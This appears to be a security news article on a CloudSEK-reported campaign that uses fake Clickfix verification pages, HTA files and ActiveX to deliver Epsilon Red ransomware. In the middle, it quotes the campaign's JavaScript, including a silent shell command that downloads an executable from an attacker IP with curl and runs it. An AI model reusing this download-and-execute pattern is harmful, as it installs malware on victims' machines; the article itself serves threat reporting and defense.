Security researchers at CloudSEK have uncovered a sophisticated malware delivery campaign using Clickfix-themed websites to distribute Epsilon Red ransomware, marking a dangerous evolution in social engineering tactics.
The campaign leverages malicious.HTA files and ActiveX objects can silently execute shell commands, bypassing traditional security measures while impersonating popular online services to deceive victims.
Unlike conventional Clickfix campaigns that copy malicious commands to clipboards, this variant employs a more direct approach by urging victims to visit a secondary page where JavaScript code creates an ActiveXObject to execute Windows shell commands.
The malicious script runs var shell = new ActiveXObject("WScript.Shell"); to establish command-line access, then silently downloads and executes the ransomware payload using the command: shell.Run("cmd /c cd /D %userprofile% && curl -s -o a.exe http://155.94.155[.]227:2269/dw/vir.exe && a.exe", 0);.
The attack concludes with a sophisticated social engineering element, displaying a fake verification message that reads “Your Verificatification Code Is: PC-19fj5e9i-cje8i3e4” – a deliberately misspelled prompt designed to appear non-threatening while maintaining the illusion of legitimate verification.
The intentional typo in “Verificatification” serves to lower suspicion of victimization by appearing amateurish rather than malicious.
CloudSEK’s investigation revealed that threat actors are operating an extensive infrastructure network, impersonating widely used services, including Discord Captcha Bot, Kick, Twitch, Rumble, and OnlyFans, to maximize their reach.
The researchers also discovered romance-themed and dating-focused Clickfix delivery pages operated by the same cybercriminal group, indicating a diversified approach to victim targeting.
Epsilon Red ransomware, first identified in 2021, bears stylistic similarities to the notorious REvil ransomware in its ransom note formatting.
However, security experts note that beyond aesthetic resemblance, the two ransomware families appear operationally distinct.
The malware sample (MD5: 98107c01ecd8b7802582d404e007e493) demonstrates the group’s continued evolution and adaptation of their attack methods.
The campaign’s impact extends beyond individual infections, as the abuse of ActiveXObject enables remote code execution directly from browser sessions, effectively bypassing traditional download protections.
Security experts recommend disabling ActiveX and Windows Script Host through Group Policy, implementing threat intelligence feeds to block known malicious IP addresses, and deploying endpoint detection rules to identify suspicious browser-spawned processes.
PortSwigger has leveled up Burp Suite's scanning arsenal with the latest Active Scan++ extension, version…
Unit 42 researchers at Palo Alto Networks exposed serious flaws in the Model Context Protocol…
Polish police have arrested three Ukrainian men traveling through Europe and seized a cache of…
Google has launched its most significant Chrome update ever, embedding Gemini AI across the browser…
Attackers exploit this vulnerability through the router's web interface components, specifically "cgibin" and "hnap_main," by…
Security researchers have uncovered a severe flaw in Apache Tika, a popular open-source toolkit for…